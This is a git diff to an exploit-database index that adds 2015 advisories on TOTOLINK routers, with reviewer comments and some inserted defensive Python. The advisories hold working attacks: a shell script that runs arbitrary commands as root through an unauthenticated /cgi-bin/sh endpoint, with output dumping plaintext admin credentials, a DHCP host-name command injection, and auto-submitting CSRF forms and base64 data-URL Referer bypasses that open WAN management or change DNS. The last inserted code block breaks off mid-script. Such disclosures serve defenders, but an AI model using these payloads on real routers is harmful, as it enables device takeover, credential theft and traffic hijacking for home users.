DB: 2015-07-17
4 new exploits
parent 9657eacb4d
commit 5454188b4e
5 changed files with 998 additions and 1 deletions
|
@ -16058,7 +16058,7 @@ id,file,description,date,author,platform,type,port
|
|||
18526,platforms/php/webapps/18526.php,"YVS Image Gallery SQL Injection",2012-02-25,CorryL,php,webapps,0
|
||||
18527,platforms/php/webapps/18527.txt,"ContaoCMS (aka TYPOlight) <= 2.11 - CSRF (Delete Admin - Delete Article)",2012-02-26,"Ivano Binetti",php,webapps,0
|
||||
18547,platforms/windows/local/18547.rb,"DJ Studio Pro 5.1 - (.pls) Stack Buffer Overflow",2012-03-02,metasploit,windows,local,0
|
||||
18531,platforms/windows/remote/18531.html,"Mozilla Firefox Firefox 4.0.1 Array.reduceRight() Exploit",2012-02-27,pa_kt,windows,remote,0
|
||||
18531,platforms/windows/remote/18531.html,"Mozilla Firefox 4.0.1 - Array.reduceRight() Exploit",2012-02-27,pa_kt,windows,remote,0
|
||||
18533,platforms/windows/local/18533.txt,"Socusoft Photo 2 Video 8.05 - Buffer Overflow Vulnerability",2012-02-27,Vulnerability-Lab,windows,local,0
|
||||
18534,platforms/windows/remote/18534.py,"Sysax Multi Server 5.53 SFTP Post Auth SEH Exploit",2012-02-27,"Craig Freyman",windows,remote,0
|
||||
18535,platforms/windows/remote/18535.py,"Sysax <= 5.53 SSH Username BoF Pre Auth RCE (Egghunter)",2012-02-27,"Craig Freyman",windows,remote,0
|
||||
|
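Review bot: the context line for 18547 (DJ Studio Pro, 2012-03-02) sits between 18527 and 18531, so this region of files.csv is not in id order; if the file is meant to be sorted by id, that row belongs after 18535 and should move in a follow-up. The changed line itself is fine: the 18531 description goes from "Mozilla Firefox Firefox 4.0.1 Array.reduceRight() Exploit" to "Mozilla Firefox 4.0.1 - Array.reduceRight() Exploit", dropping the duplicated word and adopting the "Product Version - Title" separator its neighbours use, with the path, date, author, platform, type and port fields unchanged.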
@ -33956,3 +33956,7 @@ id,file,description,date,author,platform,type,port
|
|||
37616,platforms/php/webapps/37616.txt,"PBBoard admin.php xml_name Parameter Arbitrary PHP Code Execution",2012-08-08,"High-Tech Bridge",php,webapps,0
|
||||
37617,platforms/php/webapps/37617.txt,"dirLIST Multiple Local File Include and Arbitrary File Upload Vulnerabilities",2012-08-08,L0n3ly-H34rT,php,webapps,0
|
||||
37620,platforms/php/webapps/37620.txt,"Joomla DOCman Component - Multiple Vulnerabilities",2015-07-15,"Hugo Santiago",php,webapps,80
|
||||
37623,platforms/hardware/webapps/37623.txt,"15 TOTOLINK Router Models - Multiple RCE Vulnerabilities",2015-07-16,"Pierre Kim",hardware,webapps,0
|
||||
37624,platforms/hardware/webapps/37624.txt,"4 TOTOLINK Router Models - CSRF and XSS Vulnerabilities",2015-07-16,"Pierre Kim",hardware,webapps,0
|
||||
37625,platforms/hardware/webapps/37625.txt,"4 TOTOLINK Router Models - Backdoor Credentials",2015-07-16,"Pierre Kim",hardware,webapps,0
|
||||
37626,platforms/hardware/webapps/37626.txt,"8 TOTOLINK Router Models - Backdoor and RCE",2015-07-16,"Pierre Kim",hardware,webapps,0
|
||||
|
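Review bot: the port column is inconsistent in this hunk: the four new TOTOLINK entries use 0 although 37623, 37624 and 37626 target the routers' HTTP interface (37625 is a telnet backdoor), while the 37620 Joomla entry two lines above records 80 for the same webapps type; pick one convention (80 for HTTP-based webapps exploits, 0 only when no single port applies) and apply it to all four. Also worth noting for cross-referencing: 37625 carries the author's advisory 0x03 and 37626 the advisory 0x02, so EDB ids and advisory numbers are not in the same order.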
378
platforms/hardware/webapps/37623.txt
Executable file
@ -0,0 +1,378 @@
|
|||
## Advisory Information
|
||||
|
||||
Title: 15 TOTOLINK router models vulnerable to multiple RCEs
|
||||
Advisory URL: https://pierrekim.github.io/advisories/2015-totolink-0x00.txt
|
||||
Blog URL: https://pierrekim.github.io/blog/2015-07-16-15-TOTOLINK-products-vulnerable-to-multiple-RCEs.html
|
||||
Date published: 2015-07-16
|
||||
Vendors contacted: None
|
||||
Release mode: 0days, Released
|
||||
CVE: no current CVE
|
||||
|
||||
|
||||
|
||||
## Product Description

TOTOLINK is a sister brand of ipTime, which holds over 80% of the SOHO
market in South Korea.
TOTOLINK produces routers, wifi access points and other network
devices. Their products are sold worldwide.
|
||||
|
||||
|
||||
|
||||
## Vulnerabilities Summary

The first vulnerability allows an attacker to bypass the admin
authentication and to get a direct RCE from the LAN side with a single
HTTP request.

The second vulnerability allows an attacker to bypass the admin
authentication and to get a direct RCE from the LAN side with a single
DHCP request.

Both are direct RCEs against the routers which give complete root
access to the embedded Linux from the LAN side.

The two RCEs affect 13 TOTOLINK products, from 2009-era firmwares to
the latest firmwares, in the default configuration:

- TOTOLINK A1004 : until last firmware (9.34 - za1004_en_9_34.bin)
- TOTOLINK A5004NS : until last firmware (9.38 - za5004s_en_9_38.bin)
- TOTOLINK EX300 : until last firmware (8.68 - TOTOLINK EX300_8_68.bin - totolink.net)
- TOTOLINK EX300 : until last firmware (9.36 - ex300_ch_9_36.bin.5357c0 - totolink.cn)
- TOTOLINK N150RB : until last firmware (9.08 - zn150rb_en_9_08.bin.5357c0)
- TOTOLINK N300RB : until last firmware (9.26 - zn300rb_en_9_26.bin)
- TOTOLINK N300RG : until last firmware (8.70 - TOTOLINK N300RG_8_70.bin)
- TOTOLINK N500RDG : until last firmware (8.42 - TOTOLINK N500RDG_en_8_42.bin)
- TOTOLINK N600RD : until last firmware (8.64 - TOTOLINK N600RD_en_8_64.bin)
- TOTOLINK N302R Plus V1 : until last firmware 8.82 (TOTOLINK N302R Plus V1_en_8_82.bin)
- TOTOLINK N302R Plus V2 : until last firmware 9.08 (TOTOLINK N302R Plus V2_en_9_08.bin)
- TOTOLINK A3004NS (no firmware available on totolinkusa.com, but
  ipTIME's A3004NS model was vulnerable to the 2 RCEs)
- TOTOLINK EX150 : until last firmware (8.82 - ex150_ch_8_82.bin.5357c0)


The DHCP RCE also affects 2 TOTOLINK products, from 2009-era firmwares
to the latest firmwares, in the default configuration:

- TOTOLINK A2004NS : until last firmware (9.60 - za2004s_en_9_60.bin)
- TOTOLINK EX750 : until last firmware (9.60 - ex750_en_9_60.bin)


Firmwares come from totolink.net and from totolink.cn.

From my tests, it is possible to use these vulnerabilities to
overwrite the firmware with a custom (backdoored) firmware.

Given the high CVSS score (10/10) of the vulnerabilities and their
longevity (6+ years old), TOTOLINK users are urged to contact TOTOLINK.
|
||||
|
||||
|
||||
|
||||
## Details - RCE with a single HTTP request

The HTTP server allows the attacker to execute some CGI files.

Many of them are vulnerable to a command injection which allows
executing commands with the rights of the http daemon user (root).
The exploit below posts a shell script to /cgi-bin/sh, which runs it
without any authentication.


Exploit code:

$ cat totolink.carnage
#!/bin/sh
# Usage: ./totolink.carnage <router-ip> <command> [args...]
# The POST body is handed to /cgi-bin/sh on stdin and executed as root.
# The leading echo statements emit the CGI header the HTTP server needs,
# so the command output comes back as a text/plain response.
# $PATH expands on the attacker's machine; the appended /sbin is what
# matters on the device (reboot, iptables, ... live there).
if [ -z "$1" ] || [ -z "$2" ]; then
  echo "Usage:"
  echo "$0 ip command [args...]"
  exit 1
fi
ip="$1"
shift
wget -qO- --post-data="echo 'Content-type: text/plain';echo;echo;PATH=$PATH:/sbin $*" "http://$ip/cgi-bin/sh"
|
||||
|
||||
|
||||
The exploits have also been written in HTML/JavaScript, in the form of
CSRF attacks, so that users can test their own devices live from their
browser:
http://pierrekim.github.io/advisories/
|
||||
|
||||
|
||||
o Listing of the filesystem
|
||||
|
||||
HTML/JS exploits:
|
||||
|
||||
http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-listing.of.the.filesystem.html
|
||||
|
||||
Using CLI:
|
||||
|
||||
root@kali:~/totolink# ./totolink.carnage 192.168.1.1 ls | head
|
||||
ash
|
||||
auth
|
||||
busybox
|
||||
cat
|
||||
chmod
|
||||
cp
|
||||
d.cgi
|
||||
date
|
||||
echo
|
||||
false
|
||||
root@kali:~/totolink#
|
||||
|
||||
|
||||
o Retrieving the credentials (see login and password at the end of the
dumped file):
|
||||
|
||||
HTML/JS exploits:
|
||||
|
||||
http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-dump.configuration.including.credentials.html
|
||||
|
||||
Using CLI:
|
||||
|
||||
kali# ./totolink.carnage 192.168.1.1 cat /tmp/etc/iconfig.cfg
|
||||
wantype.wan1=dynamic
|
||||
dhblock.eth1=0
|
||||
ppp_mtu=1454
|
||||
fakedns=0
|
||||
upnp=1
|
||||
ppp_mtu=1454
|
||||
timeserver=time.windows.com,gmt22,1,480,0
|
||||
wan_ifname=eth1
|
||||
auto_dns=1
|
||||
dhcp_auto_detect=0
|
||||
wireless_ifmode+wlan0=wlan0,0
|
||||
dhcpd=0
|
||||
lan_ip=192.168.1.1
|
||||
lan_netmask=255.255.255.0
|
||||
dhcpd_conf=br0,192.168.1.2,192.168.1.253,192.168.1.1,255.255.255.0
|
||||
dhcpd_dns=164.124.101.2,168.126.63.2
|
||||
dhcpd_opt=7200,30,200,
|
||||
dhcpd_configfile=/etc/udhcpd.conf
|
||||
dhcpd_lease_file=/etc/udhcpd.leases
|
||||
dhcpd_static_lease_file=/etc/udhcpd.static
|
||||
use_local_gateway=1
|
||||
login=admin
|
||||
password=admin
|
||||
|
||||
Login and password are stored in plaintext, which is a very bad
|
||||
security practice.
|
||||
|
||||
|
||||
o Current running process:
|
||||
|
||||
HTML/JS exploits:
|
||||
|
||||
http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-current.process.html
|
||||
|
||||
Using CLI:
|
||||
|
||||
kali# ./totolink.carnage 192.168.1.1 ps -auxww
|
||||
|
||||
|
||||
o Getting the kernel memory:
|
||||
|
||||
HTML/JS exploits:
|
||||
|
||||
http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-getting.kernel.memory.html
|
||||
|
||||
Using CLI:
|
||||
|
||||
kali# ./totolink.carnage 192.168.1.1 cat /proc/kcore
|
||||
|
||||
|
||||
o Default firewall rules:
|
||||
|
||||
HTML/JS exploits:
|
||||
|
||||
http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-default.firewall.rules.html
|
||||
|
||||
Using CLI:
|
||||
|
||||
kali# ./totolink.carnage 192.168.1.1 iptables -nL
|
||||
|
||||
|
||||
o Opening the management interface on the WAN:
|
||||
|
||||
HTML/JS exploits:
|
||||
|
||||
http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-opening.the.firewall.html
|
||||
|
||||
|
||||
o Reboot the device:
|
||||
|
||||
HTML/JS exploits:
|
||||
|
||||
http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-reboot.html
|
||||
|
||||
|
||||
o Brick the device:
|
||||
|
||||
HTML/JS exploits:
|
||||
|
||||
http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-bricking.the.device.html
|
||||
|
||||
|
||||
An attacker can use the /usr/bin/wget binary located in the file
|
||||
system of the remote device to plant a backdoor and then execute it as
|
||||
root.
|
||||
|
||||
By the way, d.cgi in /bin/ is an intentional backdoor.
|
||||
|
||||
|
||||
|
||||
## Details - RCE with a single DHCP request

This vulnerability is the exact inverse of CVE-2011-0997 (where a
malicious DHCP server could run commands on dhclient). Here the DHCP
server in TOTOLINK devices allows remote attackers to execute
arbitrary commands via shell metacharacters in the host-name field
(option 12) of a DHCP request sent by a LAN client.

Sending a DHCP request with this parameter will reboot the device:

cat /etc/dhcp/dhclient.conf

send host-name ";/sbin/reboot";

When connected to the UART port (`screen /dev/ttyUSB0 38400`), we see
the output of the /dev/console device; the DHCP request immediately
forces the reboot of the remote device:
|
||||
|
||||
|
||||
Booting...
|
||||
|
||||
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
|
||||
@
|
||||
@ chip__no chip__id mfr___id dev___id cap___id size_sft dev_size chipSize
|
||||
@ 0000000h 0c84015h 00000c8h 0000040h 0000015h 0000000h 0000015h 0200000h
|
||||
@ blk_size blk__cnt sec_size sec__cnt pageSize page_cnt chip_clk chipName
|
||||
@ 0010000h 0000020h 0001000h 0000200h 0000100h 0000010h 000004eh GD25Q16
|
||||
@
|
||||
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
|
||||
|
||||
[...]
|
||||
WiFi Simple Config v1.12 (2009.07.31-11:35+0000).
|
||||
|
||||
Launch iwcontrol: wlan0
|
||||
Reaped 317
|
||||
iwcontrol RUN OK
|
||||
SIGNAL -> Config Update signal progress
|
||||
killall: pppoe-relay: no process killed
|
||||
SIGNAL -> WAN ip changed
|
||||
WAN0 IP: 192.168.2.1
|
||||
signalling START
|
||||
Invalid upnpd exit
|
||||
killall: upnpd: no process killed
|
||||
upnpd Restart 1
|
||||
iptables: Bad rule (does a matching rule exist in that chain?)
|
||||
Session Garbage Collecting:Maybe system time is updated.( 946684825 0 )
|
||||
Update Session timestamp and try it after 5 seconds again.
|
||||
ez_ipupdate callback --> time_elapsed: 0
|
||||
Run DDNS by IP change: / 192.168.2.1
|
||||
Reaped 352
|
||||
iptables: Bad rule (does a matching rule exist in that chain?)
|
||||
Jan 1 00:00:25 miniupnpd[370]: Reloading rules from lease file
|
||||
Jan 1 00:00:25 miniupnpd[370]: could not open lease file: /var/run/upnp_pmlist
|
||||
Jan 1 00:00:25 miniupnpd[370]: HTTP listening on port 2048
|
||||
Reaped 363
|
||||
Led Silent Callback
|
||||
Turn ON All LED
|
||||
Dynamic Channel Search for wlan0 is OFF
|
||||
start_signal => plantynet_sync
|
||||
Do start_signal => plantynet_sync
|
||||
SIGNAL -> Config Update signal progress
|
||||
killall: pppoe-relay: no process killed
|
||||
SIGNAL -> WAN ip changed
|
||||
Reaped 354
|
||||
iptables: Bad rule (does a matching rule exist in that chain?)
|
||||
ez_ipupdate callback --> time_elapsed: 1
|
||||
Run DDNS by IP change: / 192.168.2.1
|
||||
Burst DDNS Registration is denied: iptime -> now:26
|
||||
Led Silent Callback
|
||||
Turn ON All LED
|
||||
/proc/sys/net/ipv4/tcp_syn_retries: cannot create
|
||||
- - - ---> Plantynet Event : 00000003
|
||||
- - - ---> PLANTYNET_SYNC_INTERNET_BLOCK_DEVICE
|
||||
|
||||
|
||||
[sending the DHCP request]
|
||||
|
||||
|
||||
[01/Jan/2000:00:01:03 +0000] [01/Jan/2000:00:01:03 +0000] Jan 1
|
||||
00:01:03 miniupnpd[370]: received signal 15, good-bye
|
||||
Reaped 392
|
||||
Reaped 318
|
||||
Reaped 314
|
||||
Reaped 290
|
||||
Reaped 288
|
||||
Reaped 268
|
||||
Reaped 370
|
||||
Reaped 367
|
||||
- - - ---> PLANTYNET_SYNC_FREE_DEVICE
|
||||
Restarting system.
|
||||
|
||||
Booting...
|
||||
|
||||
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
|
||||
@
|
||||
@ chip__no chip__id mfr___id dev___id cap___id size_sft dev_size chipSize
|
||||
@ 0000000h 0c84015h 00000c8h 0000040h 0000015h 0000000h 0000015h 0200000h
|
||||
@ blk_size blk__cnt sec_size sec__cnt pageSize page_cnt chip_clk chipName
|
||||
@ 0010000h 0000020h 0001000h 0000200h 0000100h 0000010h 000004eh GD25Q16
|
||||
@
|
||||
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
|
||||
Reboot Result from Watchdog Timeout!
|
||||
|
||||
- - - ---RealTek(RTL8196E)at 2012.07.06-04:36+0900 v0.4 [16bit](400MHz)
|
||||
Delay 1 second till reset button
|
||||
Magic Number: raw_nv 00000000
|
||||
Check Firmware(05020000) : size: 0x001ddfc8 ---->
|
||||
|
||||
|
||||
[...]
|
||||
|
||||
|
||||
An attacker can use the /usr/bin/wget binary located in the file
|
||||
system of the remote device to plant a backdoor and then execute it as
|
||||
root.
|
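The host-name injection in this section is a parsing problem on the server side: the DHCP server (udhcpd, going by the dhcpd_configfile entry in the configuration dump earlier in this advisory) copies option 12 out of the packet and lets it reach a shell. The following Python is an added example, not code from the advisory or from the TOTOLINK firmware: it builds a DHCPDISCOVER carrying the advisory's ";/sbin/reboot" host-name, parses the option block the way a DHCP server must, and applies the validation a server should perform before the hostname reaches any lease script. The packet and the other sample hostnames are constructed here; the RFC 1123 rule and the metacharacter list are the check's own assumptions.

```python
"""DHCP host-name (option 12) parser with the input check udhcpd lacked.

Added example, not from the advisory: the DISCOVER is constructed, not
captured, and hostname_verdict() is the rule a server should apply.
"""
import re
import struct

MAGIC_COOKIE = b"\x63\x82\x53\x63"
OPT_PAD, OPT_HOSTNAME, OPT_MSG_TYPE, OPT_END = 0, 12, 53, 255
DHCPDISCOVER = 1

# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens.
HOSTNAME_RE = re.compile(
    r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$")
SHELL_META = set(";|&`$()<>\n\r'\"\\")


def build_discover(mac, hostname):
    """Constructed DHCPDISCOVER: 236-byte BOOTP header, cookie, options."""
    hdr = struct.pack("!BBBBIHH4s4s4s4s16s64s128s",
                      1, 1, 6, 0,              # op=BOOTREQUEST, htype=ether, hlen, hops
                      0x3903F326, 0, 0x8000,   # xid, secs, flags (broadcast)
                      b"\0" * 4, b"\0" * 4, b"\0" * 4, b"\0" * 4,   # ciaddr..giaddr
                      mac + b"\0" * 10, b"\0" * 64, b"\0" * 128)    # chaddr, sname, file
    opts = bytes([OPT_MSG_TYPE, 1, DHCPDISCOVER])
    opts += bytes([OPT_HOSTNAME, len(hostname)]) + hostname
    opts += bytes([OPT_END])
    return hdr + MAGIC_COOKIE + opts


def parse_options(packet):
    """Return {option_code: raw_value} from a BOOTP/DHCP packet (TLV walk)."""
    if len(packet) < 240 or packet[236:240] != MAGIC_COOKIE:
        raise ValueError("not a DHCP packet")
    opts, i = {}, 240
    while i < len(packet):
        code = packet[i]
        if code == OPT_END:
            break
        if code == OPT_PAD:
            i += 1
            continue
        if i + 1 >= len(packet):
            raise ValueError("truncated option header")
        length = packet[i + 1]
        value = packet[i + 2:i + 2 + length]
        if len(value) != length:
            raise ValueError("truncated option value")
        opts[code] = value
        i += 2 + length
    return opts


def hostname_verdict(raw):
    """Classify a client-supplied host-name before anything touches a shell."""
    text = raw.decode("ascii", errors="replace")
    if any(c in SHELL_META for c in text):
        return "reject: shell metacharacters"
    if not HOSTNAME_RE.match(text):
        return "reject: not an RFC 1123 hostname"
    return "ok"


def check_packet(packet):
    """Verdict for the host-name option of one packet ('ok' when absent)."""
    opts = parse_options(packet)
    return hostname_verdict(opts[OPT_HOSTNAME]) if OPT_HOSTNAME in opts else "ok"


if __name__ == "__main__":
    mac = bytes.fromhex("00112233aabb")
    for name in (b";/sbin/reboot", b"kali", b"bad_host", b"a" * 70):
        print(name[:20], "->", check_packet(build_discover(mac, name)))
```

The fix is to reject rather than to quote: a hostname that fails hostname_verdict should never be placed in the environment of a lease script or interpolated into a command line, because quoting for one shell is easy to get wrong and the RFC 1123 character set needs no quoting at all.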
||||
|
||||
|
||||
|
||||
## Vendor Response
|
||||
|
||||
Due to "un-ethical code" found in TOTOLINK products (= backdoors found
|
||||
in new TOTOLINK devices), TOTOLINK was not contacted in regard of this
|
||||
case, but ipTIME was contacted in April 2015 concerning the first RCE.
|
||||
|
||||
|
||||
|
||||
## Report Timeline
|
||||
|
||||
* Jun 01, 2014: First RCE found by Pierre Kim and Alexandre Torres in
|
||||
ipTIME products.
|
||||
* Jun 02, 2014: Second RCE found by Pierre Kim in ipTIME products.
|
||||
* Jun 25, 2015: Similar vulnerabilities found in TOTOLINK products.
|
||||
* Jul 13, 2015: TOTOLINK silently fixed the HTTP RCE in A2004NS and
|
||||
EX750 routers.
|
||||
* Jul 13, 2015: Updated firmwares confirmed vulnerable.
|
||||
* Jul 16, 2015: A public advisory is sent to security mailing lists.
|
||||
|
||||
|
||||
|
||||
## Credit
|
||||
|
||||
These vulnerabilities were found by Alexandre Torres and Pierre Kim
|
||||
(@PierreKimSec).
|
||||
|
||||
|
||||
|
||||
## References
|
||||
|
||||
https://pierrekim.github.io/advisories/2015-totolink-0x00.txt
|
||||
https://pierrekim.github.io/blog/2015-07-16-15-TOTOLINK-products-vulnerable-to-multiple-RCEs.html
|
||||
|
||||
|
||||
|
||||
## Disclaimer
|
||||
|
||||
This advisory is licensed under a Creative Commons Attribution Non-Commercial
|
||||
Share-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/
|
294
platforms/hardware/webapps/37624.txt
Executable file
@ -0,0 +1,294 @@
|
|||
## Advisory Information
|
||||
|
||||
Title: 4 TOTOLINK router models vulnerable to CSRF and XSS attacks
|
||||
Advisory URL: https://pierrekim.github.io/advisories/2015-totolink-0x01.txt
|
||||
Blog URL: http://pierrekim.github.io/blog/2015-07-16-4-TOTOLINK-products-vulnerable-to-CSRF-and-XSS-attacks.html
|
||||
Date published: 2015-07-16
|
||||
Vendors contacted: None
|
||||
Release mode: Released, 0day
|
||||
CVE: no current CVE
|
||||
|
||||
|
||||
|
||||
## Product Description

TOTOLINK is a sister brand of ipTime, which holds over 80% of the SOHO
market in South Korea.
TOTOLINK produces routers, wifi access points and other network
devices. Their products are sold worldwide.
|
||||
|
||||
|
||||
|
||||
## Vulnerability Summary

TOTOLINK iPuppy, iPuppy3, N100RE and N200RE are wireless LAN routers.
Their current firmwares, in the default configuration, are
vulnerable to CSRF and XSS attacks.
Because the anti-CSRF protection is only a check on the static HTTP
Referer header (RFC 1945), an attacker can take over most of the
configuration and settings through the browser of anyone inside the
LAN of the router. Owners are urged to contact TOTOLINK and to enable
authentication on these products (it is disabled by default).

It affects (firmwares come from totolink.net and from totolink.cn):

TOTOLINK iPuppy : firmware 1.2.1 (TOTOLINK iPuppy__V1.2.1.update)
TOTOLINK iPuppy3 : firmware 1.0.2 (TOTOLINK iPuppy3_V1.0.2.update)
TOTOLINK N100RE-V1 : firmware V1.1-B20140723-2-432-EN
(TOTOLINK-N100RE-IP04216-RT5350-SPI-1M8M-V1.1-B20140723-2-432-EN.update)
TOTOLINK N200RE : firmware V1.4-B20140724-2-457-EN
(TOTOLINK-N200RE-IP04220-MT7620-SPI-1M8M-V1.4-B20140724-2-457-EN.update)
|
||||
|
||||
|
||||
|
||||
## Details - CSRF

The HTTP interface allows editing the configuration. This interface is
vulnerable to CSRF.

Configuration and settings can be modified with CSRF attacks:
Activate the remote control management
Change the DNS configuration
Update the firmware
Change the Wifi Configuration
Create TCP redirections to the LAN
and more...


Examples of forms exploiting the CSRF:


o Activating the remote control management on port 31337/tcp, listening
on the WAN interface:

<html>
<head>
<script>
function s() {
document.f.submit();
}
</script>
</head>
<body onload="s()">
<form id="f" name="f" method="POST" action="http://192.168.1.1/do_cmd.htm">
<input type="hidden" name="CMD" value="SYS">
<input type="hidden" name="GO" value="firewallconf_accesslist.html">
<input type="hidden" name="nowait" value="1">
<input type="hidden" name="SET0" value="17367296=31337">
<input type="hidden" name="SET1" value="17236224=1">
</form>
</body>
</html>
|
||||
|
||||
|
||||
o Changing the DNS configuration to 0.2.0.7 and 1.2.0.1:

<html>
<head>
<script>
function s() {
document.f.submit();
}
</script>
</head>
<body onload="s()">
<form id="f" name="f" method="POST" action="http://192.168.1.1/do_cmd.htm">
<input type="hidden" name="CMD" value="WAN">
<input type="hidden" name="GO" value="netconf_wansetup.html">
<input type="hidden" name="SET0" value="50397440=2">
<input type="hidden" name="SET1" value="50856960=64-E5-99-AA-AA-AA">
<input type="hidden" name="SET2" value="235077888=1">
<input type="hidden" name="SET3" value="235012865=0.2.0.7">
<input type="hidden" name="SET4" value="235012866=1.2.0.1">
<input type="hidden" name="SET5" value="51118336=0">
<input type="hidden" name="SET6" value="51839232=1">
<input type="hidden" name="SET7" value="51511552=1500">
<input type="hidden" name="SET8" value="117834240=">
<input type="hidden" name="SET9" value="117703168=">
<input type="hidden" name="SET10" value="117637376=1492">
<input type="hidden" name="SET11" value="51446016=1500">
<input type="hidden" name="SET12" value="50463488=192.168.1.1">
<input type="hidden" name="SET13" value="50529024=255.255.255.0">
<input type="hidden" name="SET14" value="50594560=192.168.1.254">
</form>
</body>
</html>
|
||||
|
||||
|
||||
The variable GO is an open redirect: any URL, for instance
http://www.google.com/, can be used.
The variable GO is also vulnerable to XSS; that is out of scope for
this advisory.


To bypass the protection (which checks the Referer header), you can, for
example, base64-encode the form and load it through a data: URL
embedded in the attacker's webpage.
The browser sends no Referer for that document, so the empty Referer is
accepted by the device and the CSRF succeeds:
|
||||
|
||||
|
||||
|
||||
o activate_admin_wan_csrf_bypass.html:
|
||||
|
||||
<html>
|
||||
<head>
|
||||
<meta http-equiv="Refresh"
|
||||
content="1;url=data:text/html;charset=utf8;base64,PGh0bWw+CjxoZWFkPgo8c2NyaXB0PgpmdW5jdGlvbiBzKCkgewogIGRvY3VtZW50LmYuc3VibWl0KCk7Cn0KPC9zY3JpcHQ+CjwvaGVhZD4KPGJvZHkgb25sb2FkPSJzKCkiPgo8Zm9ybSBpZD0iZiIgbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249Imh0dHA6Ly8xOTIuMTY4LjEuMS9kb19jbWQuaHRtIj4KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iQ01EIiB2YWx1ZT0iU1lTIj4KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iR08iIHZhbHVlPSJmaXJld2FsbGNvbmZfYWNjZXNzbGlzdC5odG1sIj4KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0ibm93YWl0IiB2YWx1ZT0iMSI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9IlNFVDAiIHZhbHVlPSIxNzM2NzI5Nj0zMTMzNyI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9IlNFVDEiIHZhbHVlPSIxNzIzNjIyND0xIj4KPC9mb3JtPgo8L2JvZHk+CjwvaHRtbD4K">
|
||||
</head>
|
||||
<body>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
|
||||
Visiting activate_admin_wan_csrf_bypass.html from a remote location will
activate the remote management interface on port 31337/TCP.

You can test it through
http://pierrekim.github.io/advisories/2015-totolink-0x01-PoC-activate_admin_wan_csrf_bypass.html
|
||||
|
||||
|
||||
|
||||
o change_dns_csrf_bypass.html:
|
||||
|
||||
<html>
|
||||
<head>
|
||||
<meta http-equiv="Refresh"
|
||||
content="1;url=data:text/html;charset=utf8;base64,PGh0bWw+CjxoZWFkPgo8c2NyaXB0PgpmdW5jdGlvbiBzKCkgewogIGRvY3VtZW50LmYuc3VibWl0KCk7Cn0KPC9zY3JpcHQ+CjwvaGVhZD4KPGJvZHkgb25sb2FkPSJzKCkiPgo8Zm9ybSBpZD0iZiIgbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249Imh0dHA6Ly8xOTIuMTY4LjEuMS9kb19jbWQuaHRtIj4KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iQ01EIiB2YWx1ZT0iV0FOIj4KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iR08iIHZhbHVlPSJuZXRjb25mX3dhbnNldHVwLmh0bWwiPgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJTRVQwIiB2YWx1ZT0iNTAzOTc0NDA9MiI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9IlNFVDEiIHZhbHVlPSI1MDg1Njk2MD02NC1FNS05OS1BQS1BQS1BQSI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9IlNFVDIiIHZhbHVlPSIyMzUwNzc4ODg9MSI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9IlNFVDMiIHZhbHVlPSIyMzUwMTI4NjU9MC4yLjAuNyI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9IlNFVDQiIHZhbHVlPSIyMzUwMTI4NjY9MS4yLjAuMSI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9IlNFVDUiIHZhbHVlPSI1MTExODMzNj0wIj4KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iU0VUNiIgdmFsdWU9IjUxODM5MjMyPTEiPgo8aW5wdXQgdHlwZT0iaGlkZGVu
|
||||
[...]">
|
||||
</head>
|
||||
<body>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
|
||||
Visiting change_dns_csrf_bypass.html from a remote location will
change the DNS servers provided by the TOTOLINK device in the LAN.

You can test it through
http://pierrekim.github.io/advisories/2015-totolink-0x01-PoC-change_dns_csrf_bypass.html
|
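To see why the Referer check fails and what a working check needs, here is an added Python example (mine, not code from the device or from the advisory). It decodes the do_cmd.htm form body shown above into its CMD/GO/SETn fields and then runs the same forged request through two validators: a model of the device's Referer-only rule, which is an assumption about the firmware based on the advisory's description (an absent Referer is accepted), and a hardened version that requires a matching Origin or Referer, a per-session token in the body, and a GO value from a fixed page list (closing the open redirect at the same time). The three request shapes (from the admin UI, from an attacker's page, from a data: URL) are constructed.

```python
"""Referer-only CSRF check modelled on the advisory, beside a hardened check.

Added example; the device's real logic is not on the page, so
referer_only_check() is an assumption: per the advisory an empty Referer
is accepted, which is what the data: URL trick relies on.
"""
from urllib.parse import parse_qsl, urlsplit

DEVICE = "http://192.168.1.1"
# Pages do_cmd.htm may send the browser to afterwards (assumed list).
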